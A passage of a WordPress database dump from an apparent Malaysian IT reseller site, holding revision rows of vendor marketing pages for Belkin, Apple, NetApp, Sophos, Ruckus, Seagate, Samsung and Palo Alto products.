/>\r\n\r\nUSB-Câ„¢ to HDMIÂ® Adapter (USB Type-C)\r\n\r\n[maxbutton id=\"9\" ]</td>\r\n<td width=\"150\"><img class=\"alignnone size-full wp-image-2340\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/webdam.web_.372.372.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\r\n\r\nUSB-Câ„¢ to HDMIÂ® Adapter (supports Dolby Vision)\r\n\r\n[maxbutton id=\"9\" ]</td>\r\n<td width=\"150\"><img class=\"alignnone size-full wp-image-2341\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-8.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\r\n\r\nLightning Audio + Charge RockStarâ„¢\r\n\r\n[maxbutton id=\"9\" ]</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n&nbsp;','Belkin','','inherit','closed','closed','','1446-revision-v1','','','2018-12-21 15:31:49','2018-12-21 07:31:49','',1446,'https://bintara.com.my/blog/2018/12/21/1446-revision-v1/',0,'revision','',0),(2171,1,'2018-12-14 13:48:36','2018-12-14 05:48:36','<h1 class=\"typography-headline\">The most powerful products for business are the ones people already love to use</h1>\r\n<p class=\"typography-intro-elevated\">Apple products have always been designed for the way we work as much as for the way we live. Today they help employees to work more simply and productively, solve problems creatively and collaborate with a shared purpose. And theyâ€™re all designed to work together beautifully. When people have access to iPhone, iPad and Mac, they can do their best work and reimagine the future of their business.</p>\r\n<span style=\"display: inline !important; float: none; background-color: transparent; color: #111111; font-family: \'SF Pro Display\',\'SF Pro Icons\',\'Helvetica Neue\',\'Helvetica\',\'Arial\',sans-serif; font-size: 32px; font-style: normal; font-variant: normal; font-weight: 600; letter-spacing: 0px; line-height: 36px; orphans: 2; text-align: left; text-decoration: none; text-indent: 0px; text-transform: none; -webkit-text-stroke-width: 0px; white-space: normal; word-spacing: 0px;\">Why iPadÂ Pro</span>\r\n<ul>\r\n 	<li>iPad Pro does what a computer does but more in intuitive way. Use multiple apps at the same time with a few taps. Move objects between apps simply by dragging and dropping, or switch apps with a single swipe.</li>\r\n 	<li>iPad Pro runs iOS, so it does all the things your iPhone does as well as things only iPad can do. And odds are you already know how to use it. Just tap, swipe, pinch, and zoom.</li>\r\n 	<li>The full-sized onscreen keyboard lets you respond to an email or write a paper and it even acts as a trackpad. And if you want a full-sized physical keyboard, just attach the Smart Keyboard Folio for a great typing experience, and front and back protection.</li>\r\n 	<li>Like photos, messages, safari, mail, calendar and more, it also comes with great productivity apps like Pages and Keynote and runs familiar apps like Microsoft Word and Adobe Photoshop CC.</li>\r\n</ul>\r\n<h2><strong>It has a place for your files and a way to get to them from all your devices</strong></h2>\r\n<ul>\r\n 	<li>All your files in one central location. With the Files app, you can organise what\'s in iCloud Drive, on third-party cloud services such as Box and Dropbox, and on your iPad Pro, however you want. So no matter where you are, your files are with you.</li>\r\n 	<li>Safely store your photos, videos, music, apps, files, contacts, and more in iCloud. So everything\'s always available on your iPad, iPhone, and Mac.</li>\r\n</ul>\r\n<h2>IT\'S MADE TO PROTECT YOUR PRIVACY</h2>\r\n<ul>\r\n 	<li>Your stuff is safe because iPad Pro comes with features like Face ID which is the most secure facial authentication system in a tablet or a computer. And it has features like Intelligent Tracking Prevention in Safari, which helps protect against websites collecting your personal data.</li>\r\n</ul>\r\n<h2>IT STAYS UP TO DATE AUTOMATICALLY</h2>\r\n<ul>\r\n 	<li>With iPad Pro, you get hassle-free updates. Turn on Automatic Updates in iOS 12 and have free updates downloaded wirelessly on your iPad Pro as soon as they\'re released. So you have the newest features, most advanced technologies and latest security updates.</li>\r\n</ul>\r\n&nbsp;','Apple','','inherit','closed','closed','','1439-revision-v1','','','2018-12-14 13:48:36','2018-12-14 05:48:36','',1439,'https://bintara.com.my/blog/2018/12/14/1439-revision-v1/',0,'revision','',0),(2237,1,'2018-12-17 09:59:27','2018-12-17 01:59:27','<h3 class=\"n-hero__content-title\">Integrate Cloud Data Services</h3>\r\n<h4 class=\"n-hero__content-subtitle\">Accelerate your cloud workloads and simplify your data protection.</h4>\r\n&nbsp;\r\n<h4 class=\"n-band__heading\">Get real value from your cloud.</h4>\r\nThe cloud is the single biggest platform for digital transformation. The rapid adoption of fast-evolving technologies, methodologies, and tools is driving innovation across the enterprise.\r\n\r\nOnly NetApp is building a comprehensive set of cloud data services to transform your businessâ€”how, when and where you work.\r\n\r\n&nbsp;\r\n<h3 class=\"ntap-section__header-title ntap-h2-medium\">Your Comprehensive Cloud Data Services Solutions</h3>\r\n<header class=\"ntap-card__header\">\r\n<h4 class=\"ntap-card__title ntap-h4-bold\">Cloud Analytics</h4>\r\n</header>Accelerate time to insight with the most capable storage services in the cloud.\r\n\r\n<strong>PRIMARY WORKLOADS:</strong>\r\n<ul>\r\n 	<li>High-performance computing</li>\r\n 	<li>Business intelligence</li>\r\n 	<li>Machine or deep learning</li>\r\n</ul>\r\n<header class=\"ntap-card__header\">\r\n<h4 class=\"ntap-card__title ntap-h4-bold\">File Services</h4>\r\n</header>Deploy the highest-performing, most available, and feature-rich file services on your choice of cloud.\r\n\r\n<strong>PRIMARY WORKLOADS:</strong>\r\n<ul>\r\n 	<li>Web content management</li>\r\n 	<li>Media and entertainment images</li>\r\n 	<li>Oil and gas repositories</li>\r\n 	<li>Enterprise applications</li>\r\n</ul>\r\n<header class=\"ntap-card__header\">\r\n<h4 class=\"ntap-card__title ntap-h4-bold\">Database</h4>\r\n</header>Deploy or move high-performance databases to the cloud with confidence.\r\n\r\n<strong>PRIMARY WORKLOADS:</strong>\r\n<ul>\r\n 	<li>ERP systems</li>\r\n 	<li>Financial transactions and reporting</li>\r\n 	<li>Customer management</li>\r\n</ul>\r\n<header class=\"ntap-card__header\">\r\n<h4 class=\"ntap-card__title ntap-h4-bold\">DevOps</h4>\r\n</header>Automate your Kubernetes and DevOps tools from storage to containers to clusters.\r\n\r\n<strong>PRIMARY WORKLOADS:</strong>\r\n<ul>\r\n 	<li>Agile software development</li>\r\n 	<li>CI/CD pipeline</li>\r\n 	<li>Artifact repositories</li>\r\n</ul>\r\n<header class=\"ntap-card__header\">\r\n<h4 class=\"ntap-card__title ntap-h4-bold\">Cloud and SaaS Backup</h4>\r\n</header>Use the cloud to protect your on-premises or cloud-native data and SaaS applications.\r\n\r\n<strong>PRIMARY USE CASES:</strong>\r\n<ul>\r\n 	<li>Backup and archive data to the cloud</li>\r\n 	<li>Protect SaaS application data</li>\r\n</ul>\r\n<header class=\"ntap-card__header\">\r\n<h4 class=\"ntap-card__title ntap-h4-bold\">Disaster Recovery</h4>\r\n</header>Increase data availability and promote new value with a cloud-based disaster recovery solution.\r\n\r\n<strong>PRIMARY USE CASES:</strong>\r\n<ul>\r\n 	<li>Enterprise applications</li>\r\n 	<li>File shares</li>\r\n 	<li>Databases</li>\r\n</ul>\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','NetApp','','inherit','closed','closed','','1552-autosave-v1','','','2018-12-17 09:59:27','2018-12-17 01:59:27','',1552,'https://bintara.com.my/blog/2018/12/17/1552-autosave-v1/',0,'revision','',0),(2175,1,'2018-12-14 14:52:06','2018-12-14 06:52:06','<h3 class=\"main-heading-content-component main-heading-content-component-c1aa2065-68a5-43f7-a2eb-801583b2fda8 \">Securing Your Industry</h3>\r\nIT security products have become as complex as the networks theyâ€™re trying to secure. At Sophos we know that the solution to complexity is not more complexity. We tackle security challenges with clarity and confidence, knowing that simple security is better security.\r\n<h4>Education</h4>\r\nProtect your faculty and staff, secure educational assets like student records and research, support institutional compliance activities and meet internal policy requirements.\r\n<h4>Healthcare</h4>\r\nSecure highly sensitive patient data with advanced security solutions, and support your activities to comply with stringent industry regulations and institutional policy.\r\n<h4>Retail</h4>\r\nSecurity breaches can destroy customer confidence. Bolster your defenses against malware, remote threats, data thefts and support your efforts to comply with industry regulations.\r\n<h4>Finance &amp; Banking</h4>\r\nSecure your financial transactions, customer PII, financial records, intellectual property and support your efforts to comply with stringent regulations and performance requirements.\r\n<h4>Government</h4>\r\nStay protected against modern day cyber threats that try to compromise sensitive data and threaten national security; secure government interests and citizen data.\r\n<h4>Public Sector</h4>\r\nReduce the cost of IT security without compromising on the quality of protection with market-leading technology that is vastly experienced in securing Public Sector organizations.\r\n\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','Sophos','','inherit','closed','closed','','1598-revision-v1','','','2018-12-14 14:52:06','2018-12-14 06:52:06','',1598,'https://bintara.com.my/blog/2018/12/14/1598-revision-v1/',0,'revision','',0),(2174,1,'2018-12-14 14:49:13','2018-12-14 06:49:13','<h3 class=\"main-heading-content-component main-heading-content-component-c1aa2065-68a5-43f7-a2eb-801583b2fda8 \">Securing Your Industry</h3>\r\n<h4>Education</h4>\r\nProtect your faculty and staff, secure educational assets like student records and research, support institutional compliance activities and meet internal policy requirements.\r\n<h4>Healthcare</h4>\r\nSecure highly sensitive patient data with advanced security solutions, and support your activities to comply with stringent industry regulations and institutional policy.\r\n<h4>Retail</h4>\r\nSecurity breaches can destroy customer confidence. Bolster your defenses against malware, remote threats, data thefts and support your efforts to comply with industry regulations.\r\n<h4>Finance &amp; Banking</h4>\r\nSecure your financial transactions, customer PII, financial records, intellectual property and support your efforts to comply with stringent regulations and performance requirements.\r\n<h4>Government</h4>\r\nStay protected against modern day cyber threats that try to compromise sensitive data and threaten national security; secure government interests and citizen data.\r\n<h4>Public Sector</h4>\r\nReduce the cost of IT security without compromising on the quality of protection with market-leading technology that is vastly experienced in securing Public Sector organizations.\r\n\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','Sophos','','inherit','closed','closed','','1598-revision-v1','','','2018-12-14 14:49:13','2018-12-14 06:49:13','',1598,'https://bintara.com.my/blog/2018/12/14/1598-revision-v1/',0,'revision','',0),(2185,1,'2018-12-14 15:34:40','2018-12-14 07:34:40','<h3>RuckusSMALL AND MEDIUM BUSINESS</h3>\n<h4>SMB Wi-Fi and Network Solutions that Just Work</h4>\nSmall and medium-size businesses (SMBs) rely on worry-free, high-performance Wi-Fi to spark growth and boost productivity. With Ruckus, Wi-Fi for businessÂ is both easy and affordable. Turn any space into a workspace with dependable network coverage. Easily set up different types of secure guest networks on the fly to engage with customers, partners, suppliers, and contractors. Ruckus access points (APs) and switches offer superior coverage and capacity, so you can grow without going over budget.\n\nYou also donâ€™t need specialized IT staff or extensive training to deploy and manage your Ruckus small business Wi-Fi solutions. With Ruckus, it just works.\n<div>\n<h3>Controller-less and Cloud-managed Wi-Fi Options</h3>\nNo IT staff?Â  No problem.Â Â Ruckus Unleashed APsÂ are plug-and-play simple, so Unleashed is the ideal Wi-Fi small business solution for your single-site business. Even without an IT staff, you can set up a high-performance WLAN to connect employees, serve customers, and support business operations.\n\n</div>\n<div>ChooseÂ Ruckus Cloud Wi-FiÂ if you have big expectations for your multi-site WLAN, but not big IT budgets or staff. Manage your sites from anywhere using a single-pane-of-glass web UI or the Ruckus Cloud mobile app. With cloud-managed Wi-Fi you never have to worry about software updates and security upgradesâ€”theyâ€™re handled automatically.</div>\n<div></div>\n<div>\n<div>\n<h3>Running Your SMB Business Over Wi-Fi</h3>\nIn a world increasingly dependent on internet connectivity, employee productivity and customer satisfaction depend on uninterrupted network access. You want the best Wi-Fi AP for your business. Ruckus APs and switches incorporate patented technologies for superior throughput, coverage, and capacity.\n\n</div>\nRuckus also ensures a rock-solid foundation for cloud-based business applications that make you more competitive, including: mobile inventory management, point-of-sale, collaboration services, customer relationship management, and ecommerce.\n<div>\n<h3>Wi-Fi for Business Gains and Cost Reductions</h3>\nAs you expand your small business Wi-Fi network, you want to be conservative with costs. Our products and services are built with cost savings in mind. Here are just a few of the ways we achieve that for you:\n\n</div>\n<ul>\n 	<li>Ruckus Unleashed and Ruckus Cloud Wi-Fi keep costs down by eliminating the need for on-premises controllers and reducing dependence on expensive IT resources.</li>\n 	<li>Use Ruckus APs withÂ SmartMeshÂ to eliminate high cabling costs in large spaces (like warehouses) and strengthen redundancy. Both Ruckus Unleashed and Ruckus Cloud Wi-Fi support meshing.</li>\n 	<li>Ruckus APs offer better capacity and coverage (handing as much as 50% more clients than competitive solutions). Fewer APs needed means savings on licenses, cable runs, switch ports, and power.</li>\n 	<li>Ruckus ICX switchesÂ offer easily upgradeable and scalable high performance connectivity for APs, VoIP phones and other network devices.Â  Available with silent operation (i.e. no fan noise) in rack-mount or compact 12-port form factor.</li>\n</ul>\n[maxbutton id=\"1\" ]\n\n</div>','Ruckus','','inherit','closed','closed','','1578-autosave-v1','','','2018-12-14 15:34:40','2018-12-14 07:34:40','',1578,'https://bintara.com.my/blog/2018/12/14/1578-autosave-v1/',0,'revision','',0),(2177,1,'2018-12-14 15:05:47','2018-12-14 07:05:47','','ironwolf-mo-b-14tb-vn0008-front-200x200','','inherit','closed','closed','','ironwolf-mo-b-14tb-vn0008-front-200x200','','','2018-12-14 15:05:47','2018-12-14 07:05:47','',1581,'https://bintara.com.my/wp-content/uploads/2018/12/ironwolf-mo-b-14tb-vn0008-front-200x200.png',0,'attachment','image/png',0),(2178,1,'2018-12-14 15:06:06','2018-12-14 07:06:06','<h3>IronWolf NAS Hard Drives</h3>\r\n<div class=\"row-fluid\">\r\n<h4><img class=\"alignnone size-full wp-image-2177\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ironwolf-mo-b-14tb-vn0008-front-200x200.png\" alt=\"\" width=\"200\" height=\"200\" /></h4>\r\n<h4 class=\"colorWhite\">The Best Comes From Within</h4>\r\n<p class=\"colorWhite\">Seagate has dominated the data storage industry for 40 years.</p>\r\n<p class=\"colorWhite\">We understand your unique data storage challenges, and crafted the IronWolf<sup>Â®</sup>Â and IronWolf Pro 14 TB NAS hard drives to help you achieve your goals.</p>\r\n\r\n<h4>Be Tough. Be Ready.</h4>\r\n<div class=\"row-fluid\">\r\n<div class=\"span6\">\r\n\r\nFor everything NAS, thereâ€™s IronWolf and IronWolf Pro always on, always working.\r\n\r\nBuilt for multi-user environments and high workload rates, these NAS hard drives are enhanced with AgileArray technology for optimal reliability and system scalability.\r\n<h4 class=\"colorWhite\">Drive Health and Data Recovery</h4>\r\n<p class=\"colorWhite\">IronWolf Health Management (IHM) means better drive health. When IronWolf or IronWolf Pro hard drives are integrated into compatible network attached storage (NAS) systems, the overall system reliability increases because the NAS system is constantly monitored and users are alerted if needed.</p>\r\nFor further protection, a Rescue Recovery Data Plan is included for 2 years when you purchase and register an IronWolf Pro drive.Â Youâ€™ll have access to a global team of world-class data recovery experts in case of unexpected data loss.\r\n<h4 class=\"colorWhite\">Built for Work. Built for Performance.</h4>\r\n<p class=\"colorWhite\">Multiple users can confidently upload and download data on a NAS system populated with IronWolf hard drives. All IronWolf hard drives are equipped with RV sensors to maintain performance in multi-bay NAS enclosures.</p>\r\n\r\n<h4 class=\"colorWhite\">Support Your Business</h4>\r\n<p class=\"colorWhite\">A small business needs data that can thrive. IronWolf NAS hard drives can handle the vibrations and high workload rates of a high data network within a multi-RAID environment.</p>\r\n\r\n<h4 class=\"colorWhite\">Be Creative. Keep Growing.</h4>\r\n<p class=\"colorWhite\">IronWolf and IronWolf Pro help keep you on schedule with 24Ã—7 remote access, backup, and file sharing. So keep doing what you do best. These drives will keep pace with your growing data storage requirements.</p>\r\n\r\n</div>\r\n</div>\r\n</div>','Seagate','','inherit','closed','closed','','1581-revision-v1','','','2018-12-14 15:06:06','2018-12-14 07:06:06','',1581,'https://bintara.com.my/blog/2018/12/14/1581-revision-v1/',0,'revision','',0),(2179,1,'2018-12-14 15:08:33','2018-12-14 07:08:33','<h3>IronWolf NAS Hard Drives</h3>\r\n<div class=\"row-fluid\">\r\n<h4><img class=\"alignnone size-full wp-image-2177\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ironwolf-mo-b-14tb-vn0008-front-200x200.png\" alt=\"\" width=\"200\" height=\"200\" /></h4>\r\n<h4 class=\"colorWhite\">The Best Comes From Within</h4>\r\n<p class=\"colorWhite\">Seagate has dominated the data storage industry for 40 years.</p>\r\n<p class=\"colorWhite\">We understand your unique data storage challenges, and crafted the IronWolf<sup>Â®</sup>Â and IronWolf Pro 14 TB NAS hard drives to help you achieve your goals.</p>\r\n\r\n<h4>Be Tough. Be Ready.</h4>\r\n<div class=\"row-fluid\">\r\n<div class=\"span6\">\r\n\r\nFor everything NAS, thereâ€™s IronWolf and IronWolf Pro always on, always working.\r\n\r\nBuilt for multi-user environments and high workload rates, these NAS hard drives are enhanced with AgileArray technology for optimal reliability and system scalability.\r\n<h4 class=\"colorWhite\">Drive Health and Data Recovery</h4>\r\n<p class=\"colorWhite\">IronWolf Health Management (IHM) means better drive health. When IronWolf or IronWolf Pro hard drives are integrated into compatible network attached storage (NAS) systems, the overall system reliability increases because the NAS system is constantly monitored and users are alerted if needed.</p>\r\nFor further protection, a Rescue Recovery Data Plan is included for 2 years when you purchase and register an IronWolf Pro drive.Â Youâ€™ll have access to a global team of world-class data recovery experts in case of unexpected data loss.\r\n<h4 class=\"colorWhite\">Built for Work. Built for Performance.</h4>\r\n<p class=\"colorWhite\">Multiple users can confidently upload and download data on a NAS system populated with IronWolf hard drives. All IronWolf hard drives are equipped with RV sensors to maintain performance in multi-bay NAS enclosures.</p>\r\n\r\n<h4 class=\"colorWhite\">Support Your Business</h4>\r\n<p class=\"colorWhite\">A small business needs data that can thrive. IronWolf NAS hard drives can handle the vibrations and high workload rates of a high data network within a multi-RAID environment.</p>\r\n\r\n<h4 class=\"colorWhite\">Be Creative. Keep Growing.</h4>\r\n<p class=\"colorWhite\">IronWolf and IronWolf Pro help keep you on schedule with 24Ã—7 remote access, backup, and file sharing. So keep doing what you do best. These drives will keep pace with your growing data storage requirements.</p>\r\n\r\n</div>\r\n[maxbutton id=\"1\" ]\r\n\r\n</div>\r\n</div>','Seagate','','inherit','closed','closed','','1581-revision-v1','','','2018-12-14 15:08:33','2018-12-14 07:08:33','',1581,'https://bintara.com.my/blog/2018/12/14/1581-revision-v1/',0,'revision','',0),(2180,1,'2018-12-19 11:55:56','2018-12-19 03:55:56','<h3>Samsung Monitor</h3>\r\n<h4>Immersive Experience</h4>\r\nDiscover the big, bold panoramic views that curved screens deliver.\r\n<h4>Excellence in Wok &amp; Play</h4>\r\nEnjoy a more Immersive Entertainment Experience through Samsungâ€™s Versatile High-Resolution Monitors\r\n\r\n&nbsp;\r\n\r\n<img class=\"alignnone wp-image-2532 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/32-CJG5-Curved-Gaming-Monitor-300x289.png\" alt=\"\" width=\"300\" height=\"289\" />\r\n<h4>32\" CJG5 Curved Gaming Monitor with WQHD Resolution and 144Hz Refresh Rate</h4>\r\n<ul>\r\n 	<li>WQHD resolution (2560x1440)</li>\r\n 	<li>144hz refresh rate</li>\r\n 	<li>Immersive viewing experience with curved screen</li>\r\n</ul>\r\n[maxbutton id=\"1\" ]\r\n\r\n&nbsp;\r\n\r\n<img class=\"alignnone wp-image-2533 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/24-Curved-Gaming-Monitor-CFG73-283x300.png\" alt=\"\" width=\"283\" height=\"300\" />\r\n<h4>24\" Curved Gaming Monitor CFG73 with Quantum Dot Display</h4>\r\n<ul>\r\n 	<li>Precise, firm positioning</li>\r\n 	<li>Curved to pull you in</li>\r\n 	<li>Smoother gameplay</li>\r\n</ul>\r\n[maxbutton id=\"1\" ]\r\n\r\n&nbsp;\r\n\r\n<img class=\"alignnone wp-image-2534 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/34-Curved-Widescreen-Monitor-300x206.png\" alt=\"\" width=\"300\" height=\"206\" />\r\n<h4>34\" Curved Widescreen Monitor</h4>\r\n<ul>\r\n 	<li>Quantum dot technology supporting sRGB 125%</li>\r\n 	<li>1500 R Curvature 34â€ Widescreen Monitor</li>\r\n 	<li>3,000:1 contrast ratio</li>\r\n</ul>\r\n[maxbutton id=\"1\" ]\r\n\r\n&nbsp;\r\n\r\n<img class=\"alignnone wp-image-2535 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/32-Curved-LED-Monitor-300x214.png\" alt=\"\" width=\"300\" height=\"214\" />\r\n<h4>32\" Curved LED Monitor with ultra slim design</h4>\r\n<ul>\r\n 	<li>1800 R curvature for an immersive viewing experience</li>\r\n 	<li>Glossy white ultra-slim and sleek design</li>\r\n 	<li>Vibrant Superior Picture Quality</li>\r\n</ul>\r\n[maxbutton id=\"1\" ]\r\n\r\n&nbsp;\r\n\r\n<img class=\"alignnone wp-image-2536 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/32-Curved-Monitor-300x228.png\" alt=\"\" width=\"300\" height=\"228\" />\r\n<h4>32\" Curved Monitor with Quantum dot and WQHD resolution</h4>\r\n<ul>\r\n 	<li>Richer, more vivid colors with Quantum Dot technology</li>\r\n 	<li>Incredibly detailed, pin-sharp images with WQHD resolution</li>\r\n 	<li>Immersive viewing experience with Industry-leading 1800R curvature</li>\r\n 	<li>Enhanced gaming experience with AMD Freesync and Game mode</li>\r\n</ul>\r\n[maxbutton id=\"1\" ]\r\n\r\n&nbsp;\r\n\r\n<img class=\"alignnone wp-image-2537 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/49-QLED-Gaming-Monitor-CHG90-300x158.png\" alt=\"\" width=\"300\" height=\"158\" />\r\n<h4>49\" QLED Gaming Monitor CHG90 with Super Ultra-Wide Screen</h4>\r\n<ul>\r\n 	<li>Quantum Dot (QLED)</li>\r\n 	<li>HDR</li>\r\n 	<li>144 Hz refresh rate / 1 ms Respond time</li>\r\n</ul>\r\n[maxbutton id=\"1\" ]','Samsung','','inherit','closed','closed','','1580-autosave-v1','','','2018-12-19 11:55:56','2018-12-19 03:55:56','',1580,'https://bintara.com.my/blog/2018/12/14/1580-autosave-v1/',0,'revision','',0),(2526,1,'2018-12-19 12:44:54','2018-12-19 04:44:54','<h2>NEXT-GENERATION FIREWALL</h2>\r\nOur next-generation firewalls secure your business with a prevention-focused architecture and integrated innovations that are easy to deploy and use. Now, you can accelerate growth and eliminate risks at the same time.\r\n\r\nOur next-generation firewalls are available as physical appliances, virtualized appliances and cloud-delivered service, all managed consistently with Panorama.\r\n<ul>\r\n 	<li><strong>Harness shared intelligence to prevent successful attacks</strong></li>\r\n</ul>\r\nPalo Alto NetworksÂ® next-generation firewalls detect known and unknown threats, including in encrypted traffic, using intelligence generated across many thousands of customer deployments. That means they reduce risks and prevent a broad range of attacks.\r\n<ul>\r\n 	<li><strong>Automate to save time and focus on what matters most</strong></li>\r\n</ul>\r\nWith our next-generation firewalls, you can quickly create security rules that mirror business policy, are easy to maintain and adapt to your dynamic environment. They reduce response times with automated policy-based actions, and you can automate workflows via integration with administrative tools, such as ticketing services, or any system with a RESTful API.\r\n<ul>\r\n 	<li><strong>Leverage innovations that help you adapt</strong></li>\r\n</ul>\r\nOur next-generation firewalls give you access to the latest innovations of Palo Alto Networks Security Operating Platform.\r\n<h3>Products :</h3>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"120\"><img class=\"wp-image-2529 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/PA-7000.jpg\" alt=\"\" width=\"131\" height=\"115\" />\r\n<p style=\"text-align: center;\"><strong>PA-7000 Series</strong></p>\r\nPerfect blend of power, intelligence, simplicity and versatility for enterprise and service provider deployments</td>\r\n<td width=\"120\">&nbsp;\r\n\r\n<img class=\"alignnone size-full wp-image-2528\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/PA-5250.jpg\" alt=\"\" width=\"440\" height=\"196\" />\r\n<p style=\"text-align: center;\"><strong>PA-5200 Series</strong></p>\r\nNo-compromise security and high-performance versatility for data centers and service providers</td>\r\n<td width=\"120\">&nbsp;\r\n\r\n<img class=\"wp-image-2531 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/PA-5000.jpg\" alt=\"\" width=\"167\" height=\"58\" />\r\n<p style=\"text-align: center;\"><strong>PA-5000 Series</strong></p>\r\nHigh-performance with one consistent architecture for data center deployments</td>\r\n<td width=\"120\">&nbsp;\r\n\r\n<img class=\"alignnone size-full wp-image-2538\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/PA-3200.jpg\" alt=\"\" width=\"374\" height=\"135\" />\r\n<p style=\"text-align: center;\"><strong>PA-3200 Series</strong></p>\r\nPredictable performance and broad threat coverage for the internet edge</td>\r\n<td width=\"120\">&nbsp;\r\n\r\n<img class=\"alignnone size-full wp-image-2539\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/PA-3000.png\" alt=\"\" width=\"616\" height=\"195\" />\r\n<p style=\"text-align: center;\"><strong>PA-3000 Series</strong></p>\r\nMulti-gigabit throughput to prevent attacks on the internet edge</td>\r\n</tr>\r\n<tr>\r\n<td width=\"120\"><img class=\"alignnone size-full wp-image-2541\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/PA-800.jpg\" alt=\"\" width=\"440\" height=\"150\" />\r\n<p style=\"text-align: center;\"><strong>PA-800 Series</strong></p>\r\nRock-solid security for the branch and midsize business</td>\r\n<td width=\"120\">&nbsp;\r\n\r\n<img class=\"alignnone size-full wp-image-2542\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/PA500_FT.jpg\" alt=\"\" width=\"700\" height=\"123\" />\r\n<p style=\"text-align: center;\"><strong>PA-500</strong></p>\r\nConsistent architecture for a broad range of small-business applications</td>\r\n<td width=\"120\"><img class=\"alignnone size-full wp-image-2544\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/PA-220R.jpg\" alt=\"\" width=\"1600\" height=\"523\" />\r\n<p style=\"text-align: center;\"><strong>PA-220R</strong></p>\r\nRuggedized form factor for industrial applications</td>\r\n<td width=\"120\">&nbsp;\r\n\r\n<img class=\"alignnone size-full wp-image-2547\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/PA-220.jpg\" alt=\"\" width=\"640\" height=\"238\" />\r\n<p style=\"text-align: center;\"><strong>PA-220</strong></p>\r\nSmall form factor with the power to prevent network threats</td>\r\n<td width=\"120\"><img class=\"alignnone size-full wp-image-2546\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/PA-200.png\" alt=\"\" width=\"960\" height=\"420\" />\r\n<p style=\"text-align: center;\"><strong>PA-200</strong></p>\r\nNext-generation firewall in a small footprint</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>CLOUD SECURITY</h2>\r\n<ol>\r\n 	<li>\r\n<h3>Redlock</h3>\r\n</li>\r\n</ol>\r\nRedLock is a critical element of the Palo Alto Networks Security Operating Platform, enabling you to benefit from the industryâ€™s most complete offering for public cloud security. Our other cloud products allow you to:\r\n<ul>\r\n 	<li>Protect and segment cloud workloads</li>\r\n 	<li>Adopt advanced host-based protection</li>\r\n</ul>\r\n<h3>2.Â Aperture</h3>\r\nSecure the business-critical data within your SaaS applications.\r\n<ul>\r\n 	<li><strong>Risk discovery and deep visibility</strong></li>\r\n</ul>\r\nAperture provides complete visibility across all user and data activity, along with detailed analysis that helps you transition from speculation to certainty about whatâ€™s happening at any given point in time.\r\n<ul>\r\n 	<li><strong>Data leak prevention and compliance</strong></li>\r\n</ul>\r\nData within enterprise-enabled cloud applications may not be visible to an organizationâ€™s network perimeter. Aperture can connect directly to enterprise SaaS applications to provide:\r\n\r\n-Data classification and monitoring\r\n-Data Loss Prevention (DLP) capabilities\r\n-User activity tracking for anomalies\r\n-Known and unknown malware prevention\r\n-Detailed risk and usage reporting\r\n<ul>\r\n 	<li><strong>Advanced threat prevention</strong></li>\r\n</ul>\r\nYou can keep threats from spreading through the sanctioned SaaS applications, preventing a new insertion point for malware. New malware discovered by Aperture is shared with the rest of the Security Operating Platform, strengthening your overall security posture.\r\n<h3>3. VM-Series</h3>\r\nThe VM-Series offers a unique combination of visibility, control over your applications and data, and protection against both known and unknown threats. The result is an unprecedented level of security for critical deployments in private and public clouds. Specifically, the VM-Series gives you the ability to:\r\n<ul>\r\n 	<li>Protect mission-critical applications and data</li>\r\n 	<li>Block lateral movement of cyberthreats</li>\r\n 	<li>Automate security so it keeps pace with your business</li>\r\n</ul>\r\n<h2>ENDPOINT PROTECTION</h2>\r\n<h3>TRAPS</h3>\r\nProtect endpoints from malware, exploits and ransomware. Trapsâ„¢ advanced endpoint protection stops threats on the endpoint and coordinates enforcement with cloud and network security to prevent successful cyberattacks.\r\n<ul>\r\n 	<li><strong>Simple cloud-based management</strong></li>\r\n</ul>\r\nWith the Traps management service, a cloud-based endpoint security service, you save the time and cost of having to build out your own global security infrastructure. Deployment is simple and fast, requiring no server licenses, databases or other infrastructure to get started.\r\n<ul>\r\n 	<li><strong>Intuitive user experience</strong></li>\r\n</ul>\r\nTraps provides an intuitive interface that makes it easy to manage policies and events, and accelerate incident response â€“ helping to minimize the operational challenges associated with protecting your endpoints. From the Traps management service web console, you can manage the endpoint security policy, review security events as they occur, and perform additional analysis of associated logs.\r\n<ul>\r\n 	<li><strong>Lightweight, non-disruptive agent</strong></li>\r\n</ul>\r\nThe Traps agent enforces your security policy on the endpoint and reports when it detects a threat. The Traps endpoint agent consists of various drivers and services yet requires minimal memory and CPU usage to ensure a non-disruptive user experience. Following its deployment, system administrators have complete control over all Traps agents in the environment through the Traps management service.\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n&nbsp;','PaloAlto','','inherit','closed','closed','','1569-autosave-v1','','','2018-12-19 12:44:54','2018-12-19 04:44:54','',1569,'https://bintara.com.my/blog/2018/12/19/1569-autosave-v1/',0,'revision','',0),(2181,1,'2018-12-14 15:26:16','2018-12-14 07:26:16','<h3 